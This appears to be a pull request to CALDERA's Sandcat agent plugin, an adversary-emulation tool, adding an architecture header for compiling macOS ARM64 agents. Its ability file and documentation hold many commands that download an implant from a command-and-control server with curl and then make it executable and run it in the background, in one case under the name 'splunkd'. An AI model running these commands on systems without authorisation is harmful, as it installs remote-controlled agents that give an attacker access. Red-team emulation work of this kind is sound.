### PR TITLE
[VIRTS-4690] Add Architecture Header to Sandcat

### DIFF
--- a/.github/workflows/go.yml
+++ b/.github/workflows/go.yml
@@ -29,13 +29,14 @@ jobs:
       env:
         GOOS: windows
 
-    - name: Build Darwin
+    - name: Build Darwin amd64
       run: |
         cd gocat
-        go build -o sandcat.go-darwin -ldflags="-s -w" sandcat.go
-        file sandcat.go-darwin && ls -al sandcat.go-darwin
+        go build -o sandcat.go-darwin-amd64 -ldflags="-s -w" sandcat.go
+        file sandcat.go-darwin-amd64 && ls -al sandcat.go-darwin-amd64
       env:
         GOOS: darwin
+        GOARCH: amd64
 
     - name: Build Darwin arm64
       run: |

--- a/app/sand_svc.py
+++ b/app/sand_svc.py
@@ -133,7 +133,7 @@ class SandService(BaseService):
 
         # Load extensions and compile. Extensions need to be loaded before searching for target file.
         installed_extensions = await self._install_gocat_extensions(extension_names)
-        plugin, file_path = await self.file_svc.find_file_path(compile_target_name, location=compile_target_dir)
+        _, file_path = await self.file_svc.find_file_path(compile_target_name, location=compile_target_dir)
         self.file_svc.log.debug('Dynamically compiling %s' % compile_target_name)
         build_path, build_file = os.path.split(file_path)
         await self.file_svc.compile_go(platform, output, build_file, arch=architecture, buildmode=buildmode,

--- a/app/sand_svc.py
+++ b/app/sand_svc.py
@@ -113,6 +113,7 @@ class SandService(BaseService):
         If a gocat variant is specified along with additional extensions, the extensions will be added to the
         base extensions for the variant.
         """
+        architecture = headers.get('architecture', 'amd64')
         ldflags = ['-s', '-w', '-X main.key=%s' % (self._generate_key(),)]
         for param in flag_params:
             if param in headers:
@@ -135,8 +136,8 @@ class SandService(BaseService):
         plugin, file_path = await self.file_svc.find_file_path(compile_target_name, location=compile_target_dir)
         self.file_svc.log.debug('Dynamically compiling %s' % compile_target_name)
         build_path, build_file = os.path.split(file_path)
-        await self.file_svc.compile_go(platform, output, build_file, buildmode=buildmode, ldflags=' '.join(ldflags),
-                                       cflags=cflags, build_dir=build_path)
+        await self.file_svc.compile_go(platform, output, build_file, arch=architecture, buildmode=buildmode,
+                                       ldflags=' '.join(ldflags), cflags=cflags, build_dir=build_path)
 
         # Remove extension files.
         await self._uninstall_gocat_extensions(installed_extensions)

--- a/data/abilities/command-and-control/2f34977d-9558-4c12-abad-349716777c6b.yml
+++ b/data/abilities/command-and-control/2f34977d-9558-4c12-abad-349716777c6b.yml
@@ -17,45 +17,53 @@
           ./#{agents.implant_name} -server $server -v
         variations:
           - description: (AMD64) Deploy as a blue-team agent instead of red
+            architecture: AMD64
             command: |
               server="#{app.contact.http}";
               agent=$(curl -svkOJ -X POST -H "file:sandcat.go" -H "platform:darwin" -H "architecture:amd64" $server/file/download 2>&1 | grep -i "Content-Disposition" | grep -io "filename=.*" | cut -d'=' -f2 | tr -d '"\r') && chmod +x $agent 2>/dev/null;
               nohup ./$agent -server $server -group blue &
           - description: (AMD64) Download with a random name and start as a background process
+            architecture: AMD64
             command: |
               server="#{app.contact.http}";
               agent=$(curl -svkOJ -X POST -H "file:sandcat.go" -H "platform:darwin" -H "architecture:amd64" $server/file/download 2>&1 | grep -i "Content-Disposition" | grep -io "filename=.*" | cut -d'=' -f2 | tr -d '"\r') && chmod +x $agent 2>/dev/null;
               nohup ./$agent -server $server &
           - description: (AMD64) Compile red-team agent with a comma-separated list of extensions (requires GoLang).
+            architecture: AMD64
             command: |
               server="#{app.contact.http}";
               curl -s -X POST -H "file:sandcat.go" -H "platform:darwin" -H "architecture:amd64" -H "gocat-extensions:#{agent.extensions}" $server/file/download > #{agents.implant_name};
               chmod +x #{agents.implant_name};
               ./#{agents.implant_name} -server $server -v
           - description: (AMD64) Download with GIST C2
+            architecture: AMD64
             command: |
               server="#{app.contact.http}";
               curl -s -X POST -H "file:sandcat.go" -H "platform:darwin" -H "architecture:amd64" -H "gocat-extensions:gist" -H "c2:gist" $server/file/download > #{agents.implant_name};
               chmod +x #{agents.implant_name};
               ./#{agents.implant_name} -c2 GIST -v
           - description: (AMD64) Deploy as a P2P agent with known peers included in compiled agent
+            architecture: AMD64
             command: |
               server="#{app.contact.http}";
               curl -s -X POST -H "file:sandcat.go" -H "platform:darwin" -H "architecture:amd64" -H "gocat-extensions:proxy_http" -H "includeProxyPeers:HTTP" $server/file/download > #{agents.implant_name};
               chmod +x #{agents.implant_name};
               ./#{agents.implant_name} -server $server -listenP2P -v
           - description: (ARM64) CALDERA's default agent, written in GoLang. Communicates through the HTTP(S) contact by default.
+            architecture: ARM64
             command: |
               server="#{app.contact.http}";
               curl -s -X POST -H "file:sandcat.go" -H "platform:darwin" -H "architecture:arm64" $server/file/download > #{agents.implant_name};
               chmod +x #{agents.implant_name};
               ./#{agents.implant_name} -server $server -v
           - description: (ARM64) Deploy as a blue-team agent instead of red
+            architecture: ARM64
             command: |
               server="#{app.contact.http}";
               agent=$(curl -svkOJ -X POST -H "file:sandcat.go" -H "platform:darwin" -H "architecture:arm64" $server/file/download 2>&1 | grep -i "Content-Disposition" | grep -io "filename=.*" | cut -d'=' -f2 | tr -d '"\r') && chmod +x $agent 2>/dev/null;
               nohup ./$agent -server $server -group blue &
           - description: (ARM64) Download with a random name and start as a background process
+            architecture: ARM64
             command: |
               server="#{app.contact.http}";
               agent=$(curl -svkOJ -X POST -H "file:sandcat.go" -H "platform:darwin" -H "architecture:arm64" $server/file/download 2>&1 | grep -i "Content-Disposition" | grep -io "filename=.*" | cut -d'=' -f2 | tr -d '"\r') && chmod +x $agent 2>/dev/null;

--- a/data/abilities/command-and-control/2f34977d-9558-4c12-abad-349716777c6b.yml
+++ b/data/abilities/command-and-control/2f34977d-9558-4c12-abad-349716777c6b.yml
@@ -12,55 +12,55 @@
       sh:
         command: |
           server="#{app.contact.http}";
-          curl -s -X POST -H "file:sandcat.go" -H "platform:darwin" $server/file/download > #{agents.implant_name};
+          curl -s -X POST -H "file:sandcat.go" -H "platform:darwin" -H "architecture:amd64" $server/file/download > #{agents.implant_name};
           chmod +x #{agents.implant_name};
           ./#{agents.implant_name} -server $server -v
         variations:
           - description: Deploy as a blue-team agent instead of red
             command: |
               server="#{app.contact.http}";
-              agent=$(curl -svkOJ -X POST -H "file:sandcat.go" -H "platform:darwin" $server/file/download 2>&1 | grep -i "Content-Disposition" | grep -io "filename=.*" | cut -d'=' -f2 | tr -d '"\r') && chmod +x $agent 2>/dev/null;
+              agent=$(curl -svkOJ -X POST -H "file:sandcat.go" -H "platform:darwin" -H "architecture:amd64" $server/file/download 2>&1 | grep -i "Content-Disposition" | grep -io "filename=.*" | cut -d'=' -f2 | tr -d '"\r') && chmod +x $agent 2>/dev/null;
               nohup ./$agent -server $server -group blue &
           - description: Download with a random name and start as a background process
             command: |
               server="#{app.contact.http}";
-              agent=$(curl -svkOJ -X POST -H "file:sandcat.go" -H "platform:darwin" $server/file/download 2>&1 | grep -i "Content-Disposition" | grep -io "filename=.*" | cut -d'=' -f2 | tr -d '"\r') && chmod +x $agent 2>/dev/null;
+              agent=$(curl -svkOJ -X POST -H "file:sandcat.go" -H "platform:darwin" -H "architecture:amd64" $server/file/download 2>&1 | grep -i "Content-Disposition" | grep -io "filename=.*" | cut -d'=' -f2 | tr -d '"\r') && chmod +x $agent 2>/dev/null;
               nohup ./$agent -server $server &
           - description: Compile red-team agent with a comma-separated list of extensions (requires GoLang).
             command: |
               server="#{app.contact.http}";
-              curl -s -X POST -H "file:sandcat.go" -H "platform:darwin" -H "gocat-extensions:#{agent.extensions}" $server/file/download > #{agents.implant_name};
+              curl -s -X POST -H "file:sandcat.go" -H "platform:darwin" -H "architecture:amd64" -H "gocat-extensions:#{agent.extensions}" $server/file/download > #{agents.implant_name};
               chmod +x #{agents.implant_name};
               ./#{agents.implant_name} -server $server -v
           - description: Download with GIST C2
             command: |
               server="#{app.contact.http}";
-              curl -s -X POST -H "file:sandcat.go" -H "platform:darwin" -H "gocat-extensions:gist" -H "c2:gist" $server/file/download > #{agents.implant_name};
+              curl -s -X POST -H "file:sandcat.go" -H "platform:darwin" -H "architecture:amd64" -H "gocat-extensions:gist" -H "c2:gist" $server/file/download > #{agents.implant_name};
               chmod +x #{agents.implant_name};
               ./#{agents.implant_name} -c2 GIST -v
           - description: Deploy as a P2P agent with known peers included in compiled agent
             command: |
               server="#{app.contact.http}";
-              curl -s -X POST -H "file:sandcat.go" -H "platform:darwin" -H "gocat-extensions:proxy_http" -H "includeProxyPeers:HTTP" $server/file/download > #{agents.implant_name};
+              curl -s -X POST -H "file:sandcat.go" -H "platform:darwin" -H "architecture:amd64" -H "gocat-extensions:proxy_http" -H "includeProxyPeers:HTTP" $server/file/download > #{agents.implant_name};
               chmod +x #{agents.implant_name};
               ./#{agents.implant_name} -server $server -listenP2P -v
     darwin-arm64:
       sh:
         command: |
           server="#{app.contact.http}";
-          curl -s -X POST -H "file:sandcat.go" -H "platform:darwin-arm64" $server/file/download > #{agents.implant_name};
+          curl -s -X POST -H "file:sandcat.go" -H "platform:darwin-arm64" -H "architecture:arm64" $server/file/download > #{agents.implant_name};
           chmod +x #{agents.implant_name};
           ./#{agents.implant_name} -server $server -v
         variations:
           - description: Deploy as a blue-team agent instead of red
             command: |
               server="#{app.contact.http}";
-              agent=$(curl -svkOJ -X POST -H "file:sandcat.go" -H "platform:darwin-arm64" $server/file/download 2>&1 | grep -i "Content-Disposition" | grep -io "filename=.*" | cut -d'=' -f2 | tr -d '"\r') && chmod +x $agent 2>/dev/null;
+              agent=$(curl -svkOJ -X POST -H "file:sandcat.go" -H "platform:darwin-arm64" -H "architecture:arm64" $server/file/download 2>&1 | grep -i "Content-Disposition" | grep -io "filename=.*" | cut -d'=' -f2 | tr -d '"\r') && chmod +x $agent 2>/dev/null;
               nohup ./$agent -server $server -group blue &
           - description: Download with a random name and start as a background process
             command: |
               server="#{app.contact.http}";
-              agent=$(curl -svkOJ -X POST -H "file:sandcat.go" -H "platform:darwin-arm64" $server/file/download 2>&1 | grep -i "Content-Disposition" | grep -io "filename=.*" | cut -d'=' -f2 | tr -d '"\r') && chmod +x $agent 2>/dev/null;
+              agent=$(curl -svkOJ -X POST -H "file:sandcat.go" -H "platform:darwin-arm64" -H "architecture:arm64" $server/file/download 2>&1 | grep -i "Content-Disposition" | grep -io "filename=.*" | cut -d'=' -f2 | tr -d '"\r') && chmod +x $agent 2>/dev/null;
               nohup ./$agent -server $server &
     linux:
       sh:

--- a/data/abilities/command-and-control/2f34977d-9558-4c12-abad-349716777c6b.yml
+++ b/data/abilities/command-and-control/2f34977d-9558-4c12-abad-349716777c6b.yml
@@ -69,12 +69,12 @@
               agent=$(curl -svkOJ -X POST -H "file:sandcat.go" -H "platform:darwin" -H "architecture:arm64" $server/file/download 2>&1 | grep -i "Content-Disposition" | grep -io "filename=.*" | cut -d'=' -f2 | tr -d '"\r') && chmod +x $agent 2>/dev/null;
               nohup ./$agent -server $server &
           - description: (ARM64) Compile red-team agent with a comma-separated list of extensions (requires GoLang).
-              architecture: ARM64
-              command: |
-                server="#{app.contact.http}";
-                curl -s -X POST -H "file:sandcat.go" -H "platform:darwin" -H "architecture:arm64" -H "gocat-extensions:#{agent.extensions}" $server/file/download > #{agents.implant_name};
-                chmod +x #{agents.implant_name};
-                ./#{agents.implant_name} -server $server -v
+            architecture: ARM64
+            command: |
+              server="#{app.contact.http}";
+              curl -s -X POST -H "file:sandcat.go" -H "platform:darwin" -H "architecture:arm64" -H "gocat-extensions:#{agent.extensions}" $server/file/download > #{agents.implant_name};
+              chmod +x #{agents.implant_name};
+              ./#{agents.implant_name} -server $server -v
           - description: (ARM64) Download with GIST C2
             architecture: ARM64
             command: |

--- a/data/abilities/command-and-control/2f34977d-9558-4c12-abad-349716777c6b.yml
+++ b/data/abilities/command-and-control/2f34977d-9558-4c12-abad-349716777c6b.yml
@@ -68,6 +68,27 @@
               server="#{app.contact.http}";
               agent=$(curl -svkOJ -X POST -H "file:sandcat.go" -H "platform:darwin" -H "architecture:arm64" $server/file/download 2>&1 | grep -i "Content-Disposition" | grep -io "filename=.*" | cut -d'=' -f2 | tr -d '"\r') && chmod +x $agent 2>/dev/null;
               nohup ./$agent -server $server &
+          - description: (ARM64) Compile red-team agent with a comma-separated list of extensions (requires GoLang).
+              architecture: ARM64
+              command: |
+                server="#{app.contact.http}";
+                curl -s -X POST -H "file:sandcat.go" -H "platform:darwin" -H "architecture:arm64" -H "gocat-extensions:#{agent.extensions}" $server/file/download > #{agents.implant_name};
+                chmod +x #{agents.implant_name};
+                ./#{agents.implant_name} -server $server -v
+          - description: (ARM64) Download with GIST C2
+            architecture: ARM64
+            command: |
+              server="#{app.contact.http}";
+              curl -s -X POST -H "file:sandcat.go" -H "platform:darwin" -H "architecture:arm64" -H "gocat-extensions:gist" -H "c2:gist" $server/file/download > #{agents.implant_name};
+              chmod +x #{agents.implant_name};
+              ./#{agents.implant_name} -c2 GIST -v
+          - description: (ARM64) Deploy as a P2P agent with known peers included in compiled agent
+            architecture: ARM64
+            command: |
+              server="#{app.contact.http}";
+              curl -s -X POST -H "file:sandcat.go" -H "platform:darwin" -H "architecture:arm64" -H "gocat-extensions:proxy_http" -H "includeProxyPeers:HTTP" $server/file/download > #{agents.implant_name};
+              chmod +x #{agents.implant_name};
+              ./#{agents.implant_name} -server $server -listenP2P -v
     linux:
       sh:
         command: |

--- a/data/abilities/command-and-control/2f34977d-9558-4c12-abad-349716777c6b.yml
+++ b/data/abilities/command-and-control/2f34977d-9558-4c12-abad-349716777c6b.yml
@@ -2,7 +2,7 @@
 
 - id: 2f34977d-9558-4c12-abad-349716777c6b
   name: Sandcat
-  description: CALDERA's default agent, written in GoLang. Communicates through the HTTP(S) contact by default.
+  description: [AMD64] CALDERA's default agent, written in GoLang. Communicates through the HTTP(S) contact by default.
   tactic: command-and-control
   technique:
     attack_id: T1105
@@ -16,51 +16,49 @@
           chmod +x #{agents.implant_name};
           ./#{agents.implant_name} -server $server -v
         variations:
-          - description: Deploy as a blue-team agent instead of red
+          - description: [AMD64] Deploy as a blue-team agent instead of red
             command: |
               server="#{app.contact.http}";
               agent=$(curl -svkOJ -X POST -H "file:sandcat.go" -H "platform:darwin" -H "architecture:amd64" $server/file/download 2>&1 | grep -i "Content-Disposition" | grep -io "filename=.*" | cut -d'=' -f2 | tr -d '"\r') && chmod +x $agent 2>/dev/null;
               nohup ./$agent -server $server -group blue &
-          - description: Download with a random name and start as a background process
+          - description: [AMD64] Download with a random name and start as a background process
             command: |
               server="#{app.contact.http}";
               agent=$(curl -svkOJ -X POST -H "file:sandcat.go" -H "platform:darwin" -H "architecture:amd64" $server/file/download 2>&1 | grep -i "Content-Disposition" | grep -io "filename=.*" | cut -d'=' -f2 | tr -d '"\r') && chmod +x $agent 2>/dev/null;
               nohup ./$agent -server $server &
-          - description: Compile red-team agent with a comma-separated list of extensions (requires GoLang).
+          - description: [AMD64] Compile red-team agent with a comma-separated list of extensions (requires GoLang).
             command: |
               server="#{app.contact.http}";
               curl -s -X POST -H "file:sandcat.go" -H "platform:darwin" -H "architecture:amd64" -H "gocat-extensions:#{agent.extensions}" $server/file/download > #{agents.implant_name};
               chmod +x #{agents.implant_name};
               ./#{agents.implant_name} -server $server -v
-          - description: Download with GIST C2
+          - description: [AMD64] Download with GIST C2
             command: |
               server="#{app.contact.http}";
               curl -s -X POST -H "file:sandcat.go" -H "platform:darwin" -H "architecture:amd64" -H "gocat-extensions:gist" -H "c2:gist" $server/file/download > #{agents.implant_name};
               chmod +x #{agents.implant_name};
               ./#{agents.implant_name} -c2 GIST -v
-          - description: Deploy as a P2P agent with known peers included in compiled agent
+          - description: [AMD64] Deploy as a P2P agent with known peers included in compiled agent
             command: |
               server="#{app.contact.http}";
               curl -s -X POST -H "file:sandcat.go" -H "platform:darwin" -H "architecture:amd64" -H "gocat-extensions:proxy_http" -H "includeProxyPeers:HTTP" $server/file/download > #{agents.implant_name};
               chmod +x #{agents.implant_name};
               ./#{agents.implant_name} -server $server -listenP2P -v
-    darwin-arm64:
-      sh:
-        command: |
-          server="#{app.contact.http}";
-          curl -s -X POST -H "file:sandcat.go" -H "platform:darwin-arm64" -H "architecture:arm64" $server/file/download > #{agents.implant_name};
-          chmod +x #{agents.implant_name};
-          ./#{agents.implant_name} -server $server -v
-        variations:
-          - description: Deploy as a blue-team agent instead of red
+          - description: [ARM64] CALDERA's default agent, written in GoLang. Communicates through the HTTP(S) contact by default.
             command: |
               server="#{app.contact.http}";
-              agent=$(curl -svkOJ -X POST -H "file:sandcat.go" -H "platform:darwin-arm64" -H "architecture:arm64" $server/file/download 2>&1 | grep -i "Content-Disposition" | grep -io "filename=.*" | cut -d'=' -f2 | tr -d '"\r') && chmod +x $agent 2>/dev/null;
+              curl -s -X POST -H "file:sandcat.go" -H "platform:darwin" -H "architecture:arm64" $server/file/download > #{agents.implant_name};
+              chmod +x #{agents.implant_name};
+              ./#{agents.implant_name} -server $server -v
+          - description: [ARM64] Deploy as a blue-team agent instead of red
+            command: |
+              server="#{app.contact.http}";
+              agent=$(curl -svkOJ -X POST -H "file:sandcat.go" -H "platform:darwin" -H "architecture:arm64" $server/file/download 2>&1 | grep -i "Content-Disposition" | grep -io "filename=.*" | cut -d'=' -f2 | tr -d '"\r') && chmod +x $agent 2>/dev/null;
               nohup ./$agent -server $server -group blue &
-          - description: Download with a random name and start as a background process
+          - description: [ARM64] Download with a random name and start as a background process
             command: |
               server="#{app.contact.http}";
-              agent=$(curl -svkOJ -X POST -H "file:sandcat.go" -H "platform:darwin-arm64" -H "architecture:arm64" $server/file/download 2>&1 | grep -i "Content-Disposition" | grep -io "filename=.*" | cut -d'=' -f2 | tr -d '"\r') && chmod +x $agent 2>/dev/null;
+              agent=$(curl -svkOJ -X POST -H "file:sandcat.go" -H "platform:darwin" -H "architecture:arm64" $server/file/download 2>&1 | grep -i "Content-Disposition" | grep -io "filename=.*" | cut -d'=' -f2 | tr -d '"\r') && chmod +x $agent 2>/dev/null;
               nohup ./$agent -server $server &
     linux:
       sh:

--- a/data/abilities/command-and-control/2f34977d-9558-4c12-abad-349716777c6b.yml
+++ b/data/abilities/command-and-control/2f34977d-9558-4c12-abad-349716777c6b.yml
@@ -2,7 +2,7 @@
 
 - id: 2f34977d-9558-4c12-abad-349716777c6b
   name: Sandcat
-  description: [AMD64] CALDERA's default agent, written in GoLang. Communicates through the HTTP(S) contact by default.
+  description: CALDERA's default agent, written in GoLang. Communicates through the HTTP(S) contact by default.
   tactic: command-and-control
   technique:
     attack_id: T1105
@@ -16,46 +16,46 @@
           chmod +x #{agents.implant_name};
           ./#{agents.implant_name} -server $server -v
         variations:
-          - description: [AMD64] Deploy as a blue-team agent instead of red
+          - description: (AMD64) Deploy as a blue-team agent instead of red
             command: |
               server="#{app.contact.http}";
               agent=$(curl -svkOJ -X POST -H "file:sandcat.go" -H "platform:darwin" -H "architecture:amd64" $server/file/download 2>&1 | grep -i "Content-Disposition" | grep -io "filename=.*" | cut -d'=' -f2 | tr -d '"\r') && chmod +x $agent 2>/dev/null;
               nohup ./$agent -server $server -group blue &
-          - description: [AMD64] Download with a random name and start as a background process
+          - description: (AMD64) Download with a random name and start as a background process
             command: |
               server="#{app.contact.http}";
               agent=$(curl -svkOJ -X POST -H "file:sandcat.go" -H "platform:darwin" -H "architecture:amd64" $server/file/download 2>&1 | grep -i "Content-Disposition" | grep -io "filename=.*" | cut -d'=' -f2 | tr -d '"\r') && chmod +x $agent 2>/dev/null;
               nohup ./$agent -server $server &
-          - description: [AMD64] Compile red-team agent with a comma-separated list of extensions (requires GoLang).
+          - description: (AMD64) Compile red-team agent with a comma-separated list of extensions (requires GoLang).
             command: |
               server="#{app.contact.http}";
               curl -s -X POST -H "file:sandcat.go" -H "platform:darwin" -H "architecture:amd64" -H "gocat-extensions:#{agent.extensions}" $server/file/download > #{agents.implant_name};
               chmod +x #{agents.implant_name};
               ./#{agents.implant_name} -server $server -v
-          - description: [AMD64] Download with GIST C2
+          - description: (AMD64) Download with GIST C2
             command: |
               server="#{app.contact.http}";
               curl -s -X POST -H "file:sandcat.go" -H "platform:darwin" -H "architecture:amd64" -H "gocat-extensions:gist" -H "c2:gist" $server/file/download > #{agents.implant_name};
               chmod +x #{agents.implant_name};
               ./#{agents.implant_name} -c2 GIST -v
-          - description: [AMD64] Deploy as a P2P agent with known peers included in compiled agent
+          - description: (AMD64) Deploy as a P2P agent with known peers included in compiled agent
             command: |
               server="#{app.contact.http}";
               curl -s -X POST -H "file:sandcat.go" -H "platform:darwin" -H "architecture:amd64" -H "gocat-extensions:proxy_http" -H "includeProxyPeers:HTTP" $server/file/download > #{agents.implant_name};
               chmod +x #{agents.implant_name};
               ./#{agents.implant_name} -server $server -listenP2P -v
-          - description: [ARM64] CALDERA's default agent, written in GoLang. Communicates through the HTTP(S) contact by default.
+          - description: (ARM64) CALDERA's default agent, written in GoLang. Communicates through the HTTP(S) contact by default.
             command: |
               server="#{app.contact.http}";
               curl -s -X POST -H "file:sandcat.go" -H "platform:darwin" -H "architecture:arm64" $server/file/download > #{agents.implant_name};
               chmod +x #{agents.implant_name};
               ./#{agents.implant_name} -server $server -v
-          - description: [ARM64] Deploy as a blue-team agent instead of red
+          - description: (ARM64) Deploy as a blue-team agent instead of red
             command: |
               server="#{app.contact.http}";
               agent=$(curl -svkOJ -X POST -H "file:sandcat.go" -H "platform:darwin" -H "architecture:arm64" $server/file/download 2>&1 | grep -i "Content-Disposition" | grep -io "filename=.*" | cut -d'=' -f2 | tr -d '"\r') && chmod +x $agent 2>/dev/null;
               nohup ./$agent -server $server -group blue &
-          - description: [ARM64] Download with a random name and start as a background process
+          - description: (ARM64) Download with a random name and start as a background process
             command: |
               server="#{app.contact.http}";
               agent=$(curl -svkOJ -X POST -H "file:sandcat.go" -H "platform:darwin" -H "architecture:arm64" $server/file/download 2>&1 | grep -i "Content-Disposition" | grep -io "filename=.*" | cut -d'=' -f2 | tr -d '"\r') && chmod +x $agent 2>/dev/null;

--- a/docs/Sandcat-Details.md
+++ b/docs/Sandcat-Details.md
@@ -23,9 +23,8 @@ various use cases.
 ## Precompiled Binaries
 Precompiled agent binaries are located in the `payloads` directory and are referenced with the following filename:
 - `sandcat.go-darwin` compiled binary for Mac targets
-- `sandcat.go-darwin-arm64` compiled binary for Mac with ARM processor targets
 - `sandcat.go-linux` compiled binary for Linux targets
-- `sandcat.go-windows` compiled binary for Windows targets.
+- `sandcat.go-windows` compiled binary for Windows targets
 
 These files get updated when dynamically compiling agents, so they will always contain the
 latest compiled version on your system.

--- a/docs/Sandcat-Details.md
+++ b/docs/Sandcat-Details.md
@@ -43,6 +43,17 @@ the agent will re-compile itself dynamically to obtain a new file hash. This wil
 
 ### Options
 
+For MacOS, both amd64 and arm64 are supported. When retrieving the executable from the server, the architecture header
+can be used to select the correct executable: `-H "architecture:amd64"` or `-H "architecture:arm64"`.
+
+For example, requesting Sandcat on a MacOS amd64-based target:
+```
+server="http://0.0.0.0:8888";
+curl -s -X POST -H "file:sandcat.go" -H "platform:darwin" -H "architecture:amd64" $server/file/download > splunkd;
+chmod +x splunkd;
+./splunkd -server $server -v
+```
+
 When running the Sandcat agent binary, there are optional parameters you can use when you start the executable:
 
 * `-server [C2 endpoint]`: This is the location (e.g. HTTP URL, IPv4:port string) that the agent will use to reach the C2 server. (e.g. `-server http://10.0.0.1:8888`, `-server 10.0.0.1:53`, `-server https://example.com`). The agent must have connectivity to this endpoint. 

--- a/docs/Sandcat-Details.md
+++ b/docs/Sandcat-Details.md
@@ -23,6 +23,7 @@ various use cases.
 ## Precompiled Binaries
 Precompiled agent binaries are located in the `payloads` directory and are referenced with the following filename:
 - `sandcat.go-darwin` compiled binary for Mac targets
+- `sandcat.go-darwin-arm64` compiled binary for Mac with ARM processor targets
 - `sandcat.go-linux` compiled binary for Linux targets
 - `sandcat.go-windows` compiled binary for Windows targets
 
@@ -43,19 +44,9 @@ the agent will re-compile itself dynamically to obtain a new file hash. This wil
 
 ### Options
 
-For MacOS, both amd64 and arm64 are supported. When retrieving the executable from the server, the architecture header
-can be used to select the correct executable: `-H "architecture:amd64"` or `-H "architecture:arm64"`.
-
-For example, requesting Sandcat on a MacOS amd64-based target:
-```
-server="http://0.0.0.0:8888";
-curl -s -X POST -H "file:sandcat.go" -H "platform:darwin" -H "architecture:amd64" $server/file/download > splunkd;
-chmod +x splunkd;
-./splunkd -server $server -v
-```
-
 When running the Sandcat agent binary, there are optional parameters you can use when you start the executable:
 
+* `-H "architecture: [architecture]"`: For MacOS, both amd64 and arm64 are supported. When retrieving the executable from the server, the architecture header can be used to select the correct executable: `-H "architecture:amd64"` or `-H "architecture:arm64"`.
 * `-server [C2 endpoint]`: This is the location (e.g. HTTP URL, IPv4:port string) that the agent will use to reach the C2 server. (e.g. `-server http://10.0.0.1:8888`, `-server 10.0.0.1:53`, `-server https://example.com`). The agent must have connectivity to this endpoint. 
 * `-group [group name]`: This is the group name that you would like the agent to join when it starts. The group does not have to exist beforehand. A default group of `red` will be used if this option is not provided (e.g. `-group red`, `-group mygroup`)
 * `-v`: Toggle verbose output from sandcat. If this flag is not set, sandcat will run silently. This only applies to output that would be displayed on the target machine, for instance if running sandcat from a terminal window. This option does not affect the information that gets sent to the C2 server.

--- a/update-agents.sh
+++ b/update-agents.sh
@@ -5,6 +5,7 @@ function build() {
 GOOS=windows go build -o ../payloads/sandcat.go-windows -ldflags="-s -w" sandcat.go
 GOOS=linux go build -o ../payloads/sandcat.go-linux -ldflags="-s -w" sandcat.go
 GOOS=darwin go build -o ../payloads/sandcat.go-darwin -ldflags="-s -w" sandcat.go
+GOOS=darwin GOARCH=arm64 go build -o ../payloads/sandcat.go-darwin-arm64 -ldflags="-s -w" sandcat.go
 }
 cd gocat && build
 cd ..

--- a/update-agents.sh
+++ b/update-agents.sh
@@ -5,7 +5,6 @@ function build() {
 GOOS=windows go build -o ../payloads/sandcat.go-windows -ldflags="-s -w" sandcat.go
 GOOS=linux go build -o ../payloads/sandcat.go-linux -ldflags="-s -w" sandcat.go
 GOOS=darwin go build -o ../payloads/sandcat.go-darwin -ldflags="-s -w" sandcat.go
-GOOS=darwin GOARCH=arm64 -o ../payloads/sandcat.go-darwin-arm64 -ldflags="-s -w" sandcat.go
 }
 cd gocat && build
 cd ..


### PR DESCRIPTION
## Description
Allows users to supply an architecture header to sandcat. This will allow Darwin ARM64 users to successfully compile sandcat without emulation.

Additionally, an `architecture` key has been added to the sandcat ability file. The frontend can later be modified to use this, so that users can select platform and architecture on the agents page. Currently, all sandcat commands are being listed, but they have been labeled as (ARM64) or (AMD64).

Includes modifications to #423. 

## Type of change
- [X] New feature (non-breaking change which adds functionality)
- [X] This change requires a documentation update

## How Has This Been Tested?
Ran all of new agent commands for ARM64, and ran a few abilities with each. Agents compiled successfully and were able to transmit data successfully as well. When running `file splunkd`, the output verified that the agent was compiled for ARM64.


## Checklist:

- [X] My code follows the style guidelines of this project
- [X] I have performed a self-review of my own code
- [X] I have made corresponding changes to the documentation
- [ ] I have added tests that prove my fix is effective or that my feature works
